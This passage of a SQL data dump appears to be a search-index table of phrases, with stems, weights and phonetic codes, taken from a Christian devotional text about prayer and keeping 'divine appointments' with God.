(313403, 'day take time', 'dai take time', 0, 1, 1.4333, 'D235', 1, '*'),
(313404, 'dearly beloved keep', 'dearli beloved keep', 0, 1, 1.6333, 'D64141321', 1, '*'),
(313405, 'deep into', 'deep into', 0, 1, 1.3, 'D153', 1, '*'),
(313406, 'deep into the', 'deep into the', 0, 1, 1.4333, 'D153', 1, '*'),
(313407, 'dense', 'dens', 0, 0, 0.3333, 'D520', 2, '*'),
(313408, 'dense and', 'dens and', 0, 1, 1.3, 'D5253', 1, '*'),
(313409, 'dense and weak', 'dens and weak', 0, 1, 1.4667, 'D52532', 1, '*'),
(313410, 'departed', 'depart', 0, 0, 0.5333, 'D163', 1, '*'),
(313411, 'departed into', 'depart into', 0, 1, 1.4333, 'D16353', 1, '*'),
(313412, 'departed into a', 'depart into a', 0, 1, 1.5, 'D16353', 1, '*'),
(313413, 'destiny mark', 'destini mark', 0, 1, 1.4, 'D23562', 1, '*'),
(313414, 'destiny mark 1', 'destini mark 1', 0, 1, 1.4667, 'D23562', 1, '*'),
(313415, 'development and', 'develop and', 0, 1, 1.5, 'D1415353', 1, '*'),
(313416, 'development and character', 'develop and character', 0, 1, 1.8333, 'D141535326236', 1, '*'),
(313417, 'devil knows that', 'devil knows that', 0, 1, 1.5333, 'D142523', 1, '*'),
(313418, 'devil sponsor', 'devil sponsor', 0, 1, 1.4333, 'D1421526', 1, '*'),
(313419, 'devil sponsor you', 'devil sponsor you', 0, 1, 1.5667, 'D1421526', 1, '*'),
(313420, 'divine appointment', 'divin appointment', 0, 1, 1.6, 'D1515353', 1, '*'),
(313421, 'divine appointments', 'divin appointments', 0, 1, 1.6333, 'D15153532', 1, '*'),
(313422, 'divine appointments jacob', 'divin appointments jacob', 0, 1, 1.8333, 'D151535321', 1, '*'),
(313423, 'divine relevance', 'divin relevance', 0, 1, 1.5333, 'D1564152', 1, '*'),
(313424, 'divine relevance by', 'divin relevance by', 0, 1, 1.6333, 'D15641521', 1, '*'),
(313425, 'doing exploits', 'do exploits', 0, 1, 1.4667, 'D521432', 1, '*'),
(313426, 'doing exploits for', 'do exploits for', 0, 1, 1.6, 'D52143216', 1, '*'),
(313427, 'don\'t as', 'don as', 0, 1, 1.2667, 'D532', 1, '*'),
(313428, 'don\'t as a', 'don as a', 0, 1, 1.3333, 'D532', 1, '*'),
(313429, 'don\'t let the', 'don let the', 0, 1, 1.4333, 'D5343', 1, '*'),
(313430, 'doors that', 'door that', 0, 1, 1.3333, 'D623', 1, '*'),
(313431, 'doors that will', 'door that will', 0, 1, 1.5, 'D6234', 1, '*'),
(313432, 'during the', 'dure the', 0, 1, 1.3333, 'D6523', 2, '*'),
(313433, 'during the day', 'dure the day', 0, 1, 1.4667, 'D6523', 1, '*'),
(313434, 'early in', 'earli in', 0, 1, 1.2667, 'E645', 1, '*'),
(313435, 'early in the', 'earli in the', 0, 1, 1.4, 'E6453', 1, '*'),
(313436, 'either deep', 'either deep', 0, 1, 1.3667, 'E3631', 1, '*'),
(313437, 'either deep into', 'either deep into', 0, 1, 1.5333, 'E363153', 1, '*'),
(313438, 'encounters', 'encount', 0, 0, 0.6667, 'E525362', 1, '*'),
(313439, 'encounters and', 'encount and', 0, 1, 1.4667, 'E52536253', 1, '*'),
(313440, 'encounters and experiences', 'encount and experiences', 0, 1, 1.8667, 'E5253625321652', 1, '*'),
(313441, 'enemy can\'t', 'enemi can', 0, 1, 1.3667, 'E5253', 1, '*'),
(313442, 'enemy can\'t beat', 'enemi can beat', 0, 1, 1.5333, 'E525313', 1, '*'),
(313443, 'entire', 'entir', 0, 0, 0.4, 'E536', 1, '*'),
(313444, 'entire life', 'entir life', 0, 1, 1.3667, 'E53641', 1, '*'),
(313445, 'entire life and', 'entir life and', 0, 1, 1.5, 'E5364153', 1, '*'),
(313446, 'even have', 'even have', 0, 1, 1.3, 'E151', 1, '*'),
(313447, 'even have time', 'even have time', 0, 1, 1.4667, 'E15135', 1, '*'),
(313448, 'everyone that grew', 'everyon that grew', 0, 1, 1.6, 'E165326', 1, '*'),
(313449, 'everyone that has', 'everyon that has', 0, 1, 1.5667, 'E16532', 1, '*'),
(313450, 'except he', 'except he', 0, 1, 1.3, 'E213', 1, '*'),
(313451, 'except he changes', 'except he changes', 0, 1, 1.5667, 'E213252', 1, '*'),
(313452, 'experiences than', 'experi than', 0, 1, 1.5333, 'E2165235', 1, '*'),
(313453, 'experiences than those', 'experi than those', 0, 1, 1.7333, 'E216523532', 1, '*'),
(313454, 'exploits', 'exploit', 0, 0, 0.5333, 'E21432', 1, '*'),
(313455, 'exploits for', 'exploit for', 0, 1, 1.4, 'E2143216', 1, '*'),
(313456, 'exploits for god', 'exploit for god', 0, 1, 1.5333, 'E214321623', 1, '*'),
(313457, 'face will', 'face will', 0, 1, 1.3, 'F240', 1, '*'),
(313458, 'face will be', 'face will be', 0, 1, 1.4, 'F241', 1, '*'),
(313459, 'far more', 'far more', 0, 1, 1.2667, 'F656', 1, '*'),
(313460, 'far more supernatural', 'far more supernatural', 0, 1, 1.7, 'F6562165364', 1, '*'),
(313461, 'far with', 'far with', 0, 1, 1.2667, 'F630', 1, '*'),
(313462, 'far with god', 'far with god', 0, 1, 1.4, 'F6323', 1, '*'),
(313463, 'father\'s kingdom', 'father kingdom', 0, 1, 1.5333, 'F3625235', 1, '*'),
(313464, 'father\'s kingdom take', 'father kingdom take', 0, 1, 1.7, 'F362523532', 1, '*'),
(313465, 'fellowship however', 'fellowship however', 0, 1, 1.6, 'F4216', 1, '*'),
(313466, 'fellowship however there', 'fellowship however there', 0, 1, 1.8, 'F421636', 1, '*'),
(313467, 'for god now', 'for god now', 0, 1, 1.3667, 'F6235', 1, '*'),
(313468, 'for god so', 'for god so', 0, 1, 1.3333, 'F6232', 1, '*'),
(313469, 'for him there', 'for him there', 0, 1, 1.4333, 'F6536', 1, '*'),
(313470, 'for making', 'for making', 0, 1, 1.3333, 'F65252', 1, '*'),
(313471, 'for making them', 'for making them', 0, 1, 1.5, 'F6525235', 1, '*'),
(313472, 'for personal', 'for personal', 0, 1, 1.4, 'F616254', 1, '*'),
(313473, 'for personal and', 'for personal and', 0, 1, 1.5333, 'F61625453', 1, '*'),
(313474, 'forcefully advancing', 'forcefulli advancing', 0, 1, 1.6667, 'F6214315252', 1, '*'),
(313475, 'forcefully advancing the', 'forcefulli advancing the', 0, 1, 1.8, 'F62143152523', 1, '*'),
(313476, 'foundational', 'foundat', 0, 0, 0.8, 'F5354', 1, '*'),
(313477, 'foundational but', 'foundat but', 0, 1, 1.5333, 'F535413', 1, '*'),
(313478, 'foundational but it', 'foundat but it', 0, 1, 1.6333, 'F535413', 1, '*'),
(313479, 'generation and', 'gener and', 0, 1, 1.4667, 'G56353', 1, '*'),
(313480, 'generation and in', 'gener and in', 0, 1, 1.5667, 'G563535', 1, '*'),
(313481, 'get so', 'get so', 0, 1, 1.2, 'G320', 1, '*'),
(313482, 'get so busy', 'get so busy', 0, 1, 1.3667, 'G3212', 1, '*'),
(313483, 'giant of', 'giant of', 0, 1, 1.2667, 'G531', 1, '*'),
(313484, 'giant of god', 'giant of god', 0, 1, 1.4, 'G53123', 1, '*'),
(313485, 'gifts of', 'gift of', 0, 1, 1.2667, 'G1321', 2, '*'),
(313486, 'gifts of the', 'gift of the', 0, 1, 1.4, 'G13213', 2, '*'),
(313487, 'giving you', 'give you', 0, 1, 1.3333, 'G152', 1, '*'),
(313488, 'giving you satanic', 'give you satanic', 0, 1, 1.6, 'G152352', 1, '*'),
(313489, 'go far', 'go far', 0, 1, 1.2, 'G160', 1, '*'),
(313490, 'go far with', 'go far with', 0, 1, 1.3667, 'G163', 1, '*'),
(313491, 'god alone', 'god alone', 0, 1, 1.3, 'G345', 1, '*'),
(313492, 'god alone all', 'god alone all', 0, 1, 1.4333, 'G3454', 1, '*'),
(313493, 'god both', 'god both', 0, 1, 1.2667, 'G313', 1, '*'),
(313494, 'god both in', 'god both in', 0, 1, 1.3667, 'G3135', 1, '*'),
(313495, 'god don\'t', 'god don', 0, 1, 1.3, 'G353', 1, '*'),
(313496, 'god don\'t let', 'god don let', 0, 1, 1.4333, 'G35343', 1, '*'),
(313497, 'god except', 'god except', 0, 1, 1.3333, 'G3213', 2, '*'),
(313498, 'god except he', 'god except he', 0, 1, 1.4333, 'G3213', 1, '*'),
(313499, 'god from', 'god from', 0, 1, 1.2667, 'G3165', 1, '*'),
(313500, 'god from our', 'god from our', 0, 1, 1.4, 'G31656', 1, '*'),
(313501, 'god have', 'god have', 0, 1, 1.2667, 'G310', 1, '*'),
(313502, 'god have far', 'god have far', 0, 1, 1.4, 'G316', 1, '*'),
(313503, 'god he kept', 'god he kept', 0, 1, 1.3667, 'G3213', 1, '*'),
(313504, 'god i know', 'god i know', 0, 1, 1.3333, 'G325', 1, '*'),
(313505, 'god in prayer', 'god in prayer', 0, 1, 1.4333, 'G3516', 1, '*'),
(313506, 'god now everyone', 'god now everyone', 0, 1, 1.5333, 'G35165', 1, '*'),
(313507, 'god so', 'god so', 0, 1, 1.2, 'G320', 1, '*'),
(313508, 'god so that', 'god so that', 0, 1, 1.3667, 'G323', 1, '*'),
(313509, 'god take', 'god take', 0, 1, 1.2667, 'G320', 1, '*'),
(313510, 'god take time', 'god take time', 0, 1, 1.4333, 'G3235', 1, '*'),
(313511, 'god the plan', 'god the plan', 0, 1, 1.4, 'G3145', 1, '*'),
(313512, 'god this issue', 'god this issue', 0, 1, 1.4667, 'G320', 1, '*'),
(313513, 'god those', 'god those', 0, 1, 1.3, 'G320', 1, '*'),
(313514, 'god those who', 'god those who', 0, 1, 1.4333, 'G320', 1, '*'),
(313515, 'god whenever', 'god whenever', 0, 1, 1.4, 'G3516', 1, '*'),
(313516, 'god whenever i', 'god whenever i', 0, 1, 1.4667, 'G3516', 1, '*'),
(313517, 'god which', 'god which', 0, 1, 1.3, 'G320', 1, '*'),
(313518, 'god which changed', 'god which changed', 0, 1, 1.5667, 'G32523', 1, '*'),
(313519, 'great while', 'great while', 0, 1, 1.3667, 'G634', 1, '*'),
(313520, 'great while before', 'great while before', 0, 1, 1.6, 'G63416', 1, '*'),
(313521, 'greatest battle', 'greatest battle', 0, 1, 1.5, 'G6323134', 1, '*'),
(313522, 'greatest battle you', 'greatest battle you', 0, 1, 1.6333, 'G6323134', 1, '*'),
(313523, 'grew', 'grew', 0, 0, 0.2667, 'G600', 1, '*'),
(313524, 'grew to', 'grew to', 0, 1, 1.2333, 'G630', 1, '*'),
(313525, 'grew to be', 'grew to be', 0, 1, 1.3333, 'G631', 1, '*'),
(313526, 'guard', 'guard', 0, 0, 0.3333, 'G630', 1, '*'),
(313527, 'guard jealously', 'guard jealously', 0, 1, 1.5, 'G632424', 1, '*'),
(313528, 'guard jealously if', 'guard jealously if', 0, 1, 1.6, 'G6324241', 1, '*'),
(313529, 'had power', 'had power', 0, 1, 1.3, 'H316', 1, '*'),
(313530, 'had power with', 'had power with', 0, 1, 1.4667, 'H3163', 1, '*'),
(313531, 'had to wrestle', 'had to wrestle', 0, 1, 1.4667, 'H36234', 1, '*'),
(313532, 'has been consistent', 'ha been consistent', 0, 1, 1.6333, 'H215252353', 1, '*'),
(313533, 'have been responsible', 'have been responsible', 0, 1, 1.7, 'H156215214', 1, '*'),
(313534, 'have far', 'have far', 0, 1, 1.2667, 'H160', 1, '*'),
(313535, 'have far more', 'have far more', 0, 1, 1.4333, 'H1656', 1, '*'),
(313536, 'have one thing', 'have one thing', 0, 1, 1.4667, 'H15352', 1, '*'),
(313537, 'have power', 'have power', 0, 1, 1.3333, 'H160', 1, '*'),
(313538, 'have power with', 'have power with', 0, 1, 1.5, 'H163', 1, '*'),
(313539, 'have time', 'have time', 0, 1, 1.3, 'H135', 1, '*'),
(313540, 'have time for', 'have time for', 0, 1, 1.4333, 'H13516', 1, '*'),
(313541, 'he changes', 'he changes', 0, 1, 1.3333, 'H252', 1, '*'),
(313542, 'he changes maturity', 'he changes maturity', 0, 1, 1.6333, 'H2525363', 1, '*'),
(313543, 'he had power', 'he had power', 0, 1, 1.4, 'H316', 1, '*'),
(313544, 'he kept', 'he kept', 0, 1, 1.2333, 'H213', 1, '*'),
(313545, 'he kept that', 'he kept that', 0, 1, 1.4, 'H213', 1, '*'),
(313546, 'he shows', 'he shows', 0, 1, 1.2667, 'H200', 1, '*'),
(313547, 'he shows up', 'he shows up', 0, 1, 1.3667, 'H210', 1, '*'),
(313548, 'he went', 'he went', 0, 1, 1.2333, 'H530', 1, '*'),
(313549, 'he went out', 'he went out', 0, 1, 1.3667, 'H530', 1, '*'),
(313550, 'heart 16 07', 'heart 16 07', 0, 1, 1.3667, 'H630', 1, '*'),
(313551, 'help minister', 'help minister', 0, 1, 1.4333, 'H415236', 1, '*'),
(313552, 'help minister all', 'help minister all', 0, 1, 1.5667, 'H4152364', 1, '*'),
(313553, 'him there', 'him there', 0, 1, 1.3, 'H536', 1, '*'),
(313554, 'him there is', 'him there is', 0, 1, 1.4, 'H5362', 1, '*'),
(313555, 'his entire', 'hi entire', 0, 1, 1.3333, 'H2536', 1, '*'),
(313556, 'his entire life', 'hi entire life', 0, 1, 1.5, 'H253641', 1, '*'),
(313557, 'his personal appointment', 'hi personal appointment', 0, 1, 1.8, 'H21625415353', 1, '*'),
(313558, 'hours', 'hour', 0, 0, 0.3333, 'H620', 1, '*'),
(313559, 'hours when', 'hour when', 0, 1, 1.3333, 'H625', 1, '*'),
(313560, 'hours when the', 'hour when the', 0, 1, 1.4667, 'H6253', 1, '*'),
(313561, 'however there', 'howev there', 0, 1, 1.4333, 'H1636', 1, '*'),
(313562, 'however there is', 'howev there is', 0, 1, 1.5333, 'H16362', 1, '*'),
(313563, 'i see anyone', 'i see anyone', 0, 1, 1.4, 'I250', 1, '*'),
(313564, 'if you get', 'if you get', 0, 1, 1.3333, 'I123', 1, '*'),
(313565, 'if you make', 'if you make', 0, 1, 1.3667, 'I152', 1, '*'),
(313566, 'in character', 'in character', 0, 1, 1.4, 'I526236', 1, '*'),
(313567, 'in character development', 'in character development', 0, 1, 1.8, 'I526236314153', 1, '*'),
(313568, 'in common', 'in common', 0, 1, 1.3, 'I525', 1, '*'),
(313569, 'in common which', 'in common which', 0, 1, 1.5, 'I5252', 1, '*'),
(313570, 'in the christian', 'in the christian', 0, 1, 1.5333, 'I5326235', 1, '*'),
(313571, 'in the closet', 'in the closet', 0, 1, 1.4333, 'I532423', 1, '*'),
(313572, 'in the manifestation', 'in the manifestation', 0, 1, 1.6667, 'I5351235', 1, '*'),
(313573, 'in the night', 'in the night', 0, 1, 1.4, 'I53523', 1, '*'),
(313574, 'in the watches', 'in the watches', 0, 1, 1.4667, 'I532', 1, '*'),
(313575, 'in this generation', 'in this generation', 0, 1, 1.6, 'I5325635', 1, '*'),
(313576, 'into a dense', 'into a dense', 0, 1, 1.4, 'I5352', 1, '*'),
(313577, 'into a solitary', 'into a solitary', 0, 1, 1.5, 'I532436', 1, '*'),
(313578, 'into the night', 'into the night', 0, 1, 1.4667, 'I53523', 1, '*'),
(313579, 'irreplaceable', 'irreplac', 0, 0, 0.8667, 'I614214', 1, '*'),
(313580, 'irreplaceable need', 'irreplac need', 0, 1, 1.6, 'I61421453', 1, '*'),
(313581, 'irreplaceable need for', 'irreplac need for', 0, 1, 1.7333, 'I6142145316', 1, '*'),
(313582, 'is built', 'is built', 0, 1, 1.2667, 'I2143', 1, '*'),
(313583, 'is built in', 'is built in', 0, 1, 1.3667, 'I21435', 1, '*'),
(313584, 'is doing exploits', 'is doing exploits', 0, 1, 1.5667, 'I23521432', 1, '*'),
(313585, 'is not measured', 'is not measured', 0, 1, 1.5, 'I2535263', 1, '*'),
(313586, 'is the place', 'is the place', 0, 1, 1.4, 'I23142', 2, '*'),
(313587, 'is the source', 'is the source', 0, 1, 1.4333, 'I23262', 1, '*'),
(313588, 'is the unquestionable', 'is the unquestionable', 0, 1, 1.7, 'I23523514', 1, '*'),
(313589, 'is to make', 'is to make', 0, 1, 1.3333, 'I2352', 1, '*'),
(313590, 'is yet', 'is yet', 0, 1, 1.2, 'I230', 1, '*'),
(313591, 'is yet to', 'is yet to', 0, 1, 1.3, 'I230', 1, '*'),
(313592, 'issue seems', 'issu seems', 0, 1, 1.3667, 'I252', 1, '*'),
(313593, 'issue seems so', 'issu seems so', 0, 1, 1.4667, 'I252', 1, '*'),
(313594, 'it a pulpit', 'it a pulpit', 0, 1, 1.3667, 'I31413', 1, '*'),
(313595, 'it is one', 'it is one', 0, 1, 1.3, 'I325', 1, '*'),
(313596, 'item 55', 'item 55', 0, 1, 1.2333, 'I350', 1, '*'),
(313597, 'item 55 divine', 'item 55 divine', 0, 1, 1.4667, 'I35315', 1, '*'),
(313598, 'jacob had', 'jacob had', 0, 1, 1.3, 'J130', 1, '*'),
(313599, 'jacob had to', 'jacob had to', 0, 1, 1.4, 'J130', 1, '*'),
(313600, 'jealously', 'jealous', 0, 0, 0.6, 'J424', 1, '*'),
(313601, 'jealously if', 'jealous if', 0, 1, 1.4, 'J4241', 1, '*'),
(313602, 'jealously if you', 'jealous if you', 0, 1, 1.5333, 'J4241', 1, '*'),
(313603, 'jesus\' name till', 'jesu name till', 0, 1, 1.5333, 'J534', 1, '*'),
(313604, 'k2 item 55', 'k2 item 55', 0, 1, 1.3333, 'K350', 1, '*'),
(313605, 'keep divine', 'keep divine', 0, 1, 1.3667, 'K1315', 1, '*'),
(313606, 'keep divine appointments', 'keep divine appointments', 0, 1, 1.8, 'K1315153532', 1, '*'),
(313607, 'keep their', 'keep their', 0, 1, 1.3333, 'K136', 1, '*'),
(313608, 'keep their appointments', 'keep their appointments', 0, 1, 1.7667, 'K136153532', 1, '*'),
(313609, 'keep your appointment', 'keep your appointment', 0, 1, 1.7, 'K1615353', 1, '*'),
(313610, 'keep your appointments', 'keep your appointments', 0, 1, 1.7333, 'K16153532', 1, '*'),
(313611, 'keep your personal', 'keep your personal', 0, 1, 1.6, 'K1616254', 1, '*'),
(313612, 'kept that', 'kept that', 0, 1, 1.3, 'K130', 1, '*'),
(313613, 'kept that critical', 'kept that critical', 0, 1, 1.6, 'K1326324', 1, '*'),
(313614, 'kingdom take heed', 'kingdom take heed', 0, 1, 1.5667, 'K5235323', 1, '*'),
(313615, 'know that man', 'know that man', 0, 1, 1.4333, 'K535', 1, '*'),
(313616, 'knows that if', 'know that if', 0, 1, 1.4333, 'K5231', 1, '*'),
(313617, 'let the devil', 'let the devil', 0, 1, 1.4333, 'L314', 1, '*'),
(313618, 'life you get', 'life you get', 0, 1, 1.4, 'L123', 1, '*'),
(313619, 'life you will', 'life you will', 0, 1, 1.4333, 'L140', 1, '*'),
(313620, 'lord alone', 'lord alone', 0, 1, 1.3333, 'L6345', 1, '*'),
(313621, 'lord alone either', 'lord alone either', 0, 1, 1.5667, 'L634536', 1, '*'),
(313622, 'lord and it', 'lord and it', 0, 1, 1.3667, 'L6353', 1, '*'),
(313623, 'lord have', 'lord have', 0, 1, 1.3, 'L631', 1, '*'),
(313624, 'lord have been', 'lord have been', 0, 1, 1.4667, 'L6315', 1, '*'),
(313625, 'make out', 'make out', 0, 1, 1.2667, 'M230', 1, '*'),
(313626, 'make out time', 'make out time', 0, 1, 1.4333, 'M235', 1, '*'),
(313627, 'make you so', 'make you so', 0, 1, 1.3667, 'M200', 1, '*'),
(313628, 'making them', 'make them', 0, 1, 1.3667, 'M25235', 1, '*'),
(313629, 'making them to', 'make them to', 0, 1, 1.4667, 'M252353', 1, '*'),
(313630, 'man will not', 'man will not', 0, 1, 1.4, 'M453', 1, '*'),
(313631, 'manifestation of', 'manifest of', 0, 1, 1.5333, 'M12351', 2, '*'),
(313632, 'manifestation of the', 'manifest of the', 0, 1, 1.6667, 'M123513', 2, '*'),
(313633, 'mark 1 verse', 'mark 1 verse', 0, 1, 1.4, 'M62162', 1, '*'),
(313634, 'maturity', 'matur', 0, 0, 0.5333, 'M363', 1, '*'),
(313635, 'maturity of', 'matur of', 0, 1, 1.3667, 'M3631', 1, '*'),
(313636, 'maturity of a', 'matur of a', 0, 1, 1.4333, 'M3631', 1, '*'),
(313637, 'measured or', 'measur or', 0, 1, 1.3667, 'M2636', 1, '*'),
(313638, 'measured or seen', 'measur or seen', 0, 1, 1.5333, 'M263625', 1, '*'),
(313639, 'meditation', 'medit', 0, 0, 0.6667, 'M350', 1, '*'),
(313640, 'meditation and', 'medit and', 0, 1, 1.4667, 'M353', 1, '*'),
(313641, 'meditation and fellowship', 'medit and fellowship', 0, 1, 1.8333, 'M3531421', 1, '*'),
(313642, 'meetings if', 'meet if', 0, 1, 1.3667, 'M3521', 1, '*'),
(313643, 'meetings if you', 'meet if you', 0, 1, 1.5, 'M3521', 1, '*'),
(313644, 'men of substance', 'men of substance', 0, 1, 1.5333, 'M1212352', 1, '*'),
(313645, 'men of violence', 'men of violence', 0, 1, 1.5, 'M1452', 1, '*'),
(313646, 'men of worth', 'men of worth', 0, 1, 1.4, 'M163', 1, '*'),
(313647, 'minister all', 'minist all', 0, 1, 1.4, 'M2364', 1, '*'),
(313648, 'minister all of', 'minist all of', 0, 1, 1.5, 'M23641', 1, '*'),
(313649, 'minister or', 'minist or', 0, 1, 1.3667, 'M236', 1, '*'),
(313650, 'minister or help', 'minist or help', 0, 1, 1.5333, 'M23641', 1, '*'),
(313651, 'more supernatural', 'more supernatural', 0, 1, 1.5667, 'M62165364', 1, '*'),
(313652, 'more supernatural encounters', 'more supernatural encounters', 0, 1, 1.9333, 'M62165364525362', 1, '*'),
(313653, 'more time you', 'more time you', 0, 1, 1.4333, 'M635', 1, '*'),
(313654, 'morning hours', 'morn hours', 0, 1, 1.4333, 'M65262', 1, '*'),
(313655, 'morning hours when', 'morn hours when', 0, 1, 1.6, 'M652625', 1, '*'),
(313656, 'morning rising', 'morn rising', 0, 1, 1.4667, 'M6526252', 1, '*'),
(313657, 'morning rising up', 'morn rising up', 0, 1, 1.5667, 'M65262521', 1, '*'),
(313658, 'most of corporate', 'most of corporate', 0, 1, 1.5667, 'M23126163', 1, '*'),
(313659, 'must guard', 'must guard', 0, 1, 1.3333, 'M23263', 1, '*'),
(313660, 'must guard jealously', 'must guard jealously', 0, 1, 1.6667, 'M232632424', 1, '*'),
(313661, 'must spend with', 'must spend with', 0, 1, 1.5, 'M232153', 1, '*'),
(313662, 'name till', 'name till', 0, 1, 1.3, 'N340', 2, '*'),
(313663, 'name till next', 'name till next', 0, 1, 1.4667, 'N34523', 2, '*'),
(313664, 'need for a', 'need for a', 0, 1, 1.3333, 'N316', 1, '*'),
(313665, 'night before', 'night before', 0, 1, 1.4, 'N2316', 1, '*'),
(313666, 'night before he', 'night before he', 0, 1, 1.5, 'N2316', 1, '*'),
(313667, 'night or', 'night or', 0, 1, 1.2667, 'N236', 1, '*'),
(313668, 'night or early', 'night or early', 0, 1, 1.4667, 'N2364', 1, '*'),
(313669, 'night to', 'night to', 0, 1, 1.2667, 'N230', 1, '*'),
(313670, 'night to keep', 'night to keep', 0, 1, 1.4333, 'N2321', 1, '*'),
(313671, 'not be ready', 'not be ready', 0, 1, 1.4, 'N3163', 1, '*'),
(313672, 'not go', 'not go', 0, 1, 1.2, 'N320', 1, '*'),
(313673, 'not go far', 'not go far', 0, 1, 1.3333, 'N3216', 1, '*'),
(313674, 'not measured', 'not measured', 0, 1, 1.4, 'N35263', 1, '*'),
(313675, 'not measured or', 'not measured or', 0, 1, 1.5, 'N352636', 1, '*'),
(313676, 'now everyone', 'now everyone', 0, 1, 1.4, 'N165', 1, '*'),
(313677, 'now everyone that', 'now everyone that', 0, 1, 1.5667, 'N1653', 1, '*'),
(313678, 'of a believer', 'of a believer', 0, 1, 1.4333, 'O1416', 1, '*'),
(313679, 'of corporate', 'of corporate', 0, 1, 1.4, 'O126163', 1, '*'),
(313680, 'of corporate fellowship', 'of corporate fellowship', 0, 1, 1.7667, 'O1261631421', 1, '*'),
(313681, 'of corporate meetings', 'of corporate meetings', 0, 1, 1.7, 'O1261635352', 1, '*'),
(313682, 'of divine relevance', 'of divine relevance', 0, 1, 1.6333, 'O131564152', 1, '*'),
(313683, 'of fellowship', 'of fellowship', 0, 1, 1.4333, 'O1421', 1, '*'),
(313684, 'of fellowship with', 'of fellowship with', 0, 1, 1.6, 'O14213', 1, '*'),
(313685, 'of god both', 'of god both', 0, 1, 1.3667, 'O12313', 1, '*'),
(313686, 'of substance', 'of substance', 0, 1, 1.4, 'O1212352', 1, '*'),
(313687, 'of substance and', 'of substance and', 0, 1, 1.5333, 'O121235253', 1, '*'),
(313688, 'of the father\'s', 'of the father', 0, 1, 1.5, 'O131362', 1, '*'),
(313689, 'of the gifts', 'of the gifts', 0, 1, 1.4, 'O132132', 1, '*'),
(313690, 'of the night', 'of the night', 0, 1, 1.4, 'O13523', 1, '*'),
(313691, 'of their strength', 'of their strength', 0, 1, 1.5667, 'O136236523', 1, '*'),
(313692, 'of them have', 'of them have', 0, 1, 1.4, 'O1351', 1, '*'),
(313693, 'of violence', 'of violence', 0, 1, 1.3667, 'O1452', 1, '*'),
(313694, 'of violence forcefully', 'of violence forcefully', 0, 1, 1.7333, 'O145216214', 1, '*'),
(313695, 'of worth', 'of worth', 0, 1, 1.2667, 'O163', 1, '*'),
(313696, 'of worth men', 'of worth men', 0, 1, 1.4, 'O1635', 1, '*'),
(313697, 'one of those', 'on of those', 0, 1, 1.4, 'O5132', 1, '*'),
(313698, 'one thing in', 'on thing in', 0, 1, 1.4, 'O53525', 1, '*'),
(313699, 'open doors', 'open doors', 0, 1, 1.3333, 'O15362', 1, '*'),
(313700, 'open doors that', 'open doors that', 0, 1, 1.5, 'O153623', 1, '*'),
(313701, 'or early', 'or early', 0, 1, 1.2667, 'O640', 1, '*'),
(313702, 'or early in', 'or early in', 0, 1, 1.3667, 'O645', 1, '*'),
(313703, 'or help', 'or help', 0, 1, 1.2333, 'O641', 1, '*'),
(313704, 'or help minister', 'or help minister', 0, 1, 1.5333, 'O6415236', 1, '*'),
(313705, 'or seen', 'or seen', 0, 1, 1.2333, 'O625', 1, '*'),
(313706, 'or seen in', 'or seen in', 0, 1, 1.3333, 'O625', 1, '*'),
(313707, 'out and departed', 'out and departed', 0, 1, 1.5333, 'O353163', 1, '*'),
(313708, 'out in the', 'out in the', 0, 1, 1.3333, 'O353', 1, '*'),
(313709, 'out of divine', 'out of divine', 0, 1, 1.4333, 'O31315', 1, '*'),
(313710, 'out time', 'out time', 0, 1, 1.2667, 'O350', 1, '*'),
(313711, 'out time for', 'out time for', 0, 1, 1.4, 'O3516', 1, '*'),
(313712, 'past everyone', 'past everyone', 0, 1, 1.4333, 'P23165', 1, '*'),
(313713, 'past everyone that', 'past everyone that', 0, 1, 1.6, 'P231653', 1, '*'),
(313714, 'people who have', 'peopl who have', 0, 1, 1.5, 'P410', 1, '*'),
(313715, 'personal and', 'person and', 0, 1, 1.4, 'P625453', 1, '*'),
(313716, 'personal and private', 'person and private', 0, 1, 1.6667, 'P6254531613', 1, '*'),
(313717, 'personal appointment', 'person appointment', 0, 1, 1.6667, 'P625415353', 1, '*'),
(313718, 'personal appointment and', 'person appointment and', 0, 1, 1.8, 'P62541535353', 1, '*'),
(313719, 'personal appointment with', 'person appointment with', 0, 1, 1.8333, 'P625415353', 1, '*'),
(313720, 'personal appointments', 'person appointments', 0, 1, 1.7, 'P6254153532', 1, '*'),
(313721, 'personal appointments with', 'person appointments with', 0, 1, 1.8667, 'P62541535323', 1, '*'),
(313722, 'personal time', 'person time', 0, 1, 1.4333, 'P625435', 1, '*'),
(313723, 'personal time with', 'person time with', 0, 1, 1.6, 'P6254353', 1, '*'),
(313724, 'personally and', 'person and', 0, 1, 1.4667, 'P625453', 1, '*'),
(313725, 'personally and consistently', 'person and consistently', 0, 1, 1.9, 'P6254532523534', 1, '*'),
(313726, 'place and there', 'place and there', 0, 1, 1.5, 'P42536', 1, '*'),
(313727, 'place of corporate', 'place of corporate', 0, 1, 1.6, 'P42126163', 1, '*'),
(313728, 'place of fellowship', 'place of fellowship', 0, 1, 1.6333, 'P421421', 1, '*'),
(313729, 'plan of', 'plan of', 0, 1, 1.2333, 'P451', 1, '*'),
(313730, 'plan of the', 'plan of the', 0, 1, 1.3667, 'P4513', 1, '*'),
(313731, 'power with', 'power with', 0, 1, 1.3333, 'P630', 1, '*'),
(313732, 'power with god', 'power with god', 0, 1, 1.4667, 'P6323', 1, '*'),
(313733, 'prayed”.', 'prayed”.', 0, 0, 0.5333, 'P630', 1, '*'),
(313734, 'prayed”. everyone', 'prayed”. everyone', 0, 1, 1.5667, 'P63165', 1, '*'),
(313735, 'prayed”. everyone that', 'prayed”. everyone that', 0, 1, 1.7333, 'P631653', 1, '*'),
(313736, 'prayer and bible', 'prayer and bible', 0, 1, 1.5333, 'P65314', 1, '*'),
(313737, 'private', 'privat', 0, 0, 0.4667, 'P613', 1, '*'),
(313738, 'private meditation', 'privat meditation', 0, 1, 1.6, 'P613535', 1, '*'),
(313739, 'private meditation and', 'privat meditation and', 0, 1, 1.7333, 'P6135353', 1, '*'),
(313740, 'produces stability', 'produc stability', 0, 1, 1.6, 'P6323143', 1, '*'),
(313741, 'produces stability in', 'produc stability in', 0, 1, 1.7, 'P63231435', 1, '*'),
(313742, 'pulpit minister', 'pulpit minister', 0, 1, 1.5, 'P4135236', 1, '*'),
(313743, 'pulpit minister or', 'pulpit minister or', 0, 1, 1.6, 'P4135236', 1, '*'),
(313744, 'race be', 'race be', 0, 1, 1.2333, 'R210', 1, '*'),
(313745, 'race be it', 'race be it', 0, 1, 1.3333, 'R213', 1, '*'),
(313746, 'ready for him', 'readi for him', 0, 1, 1.4333, 'R3165', 1, '*'),
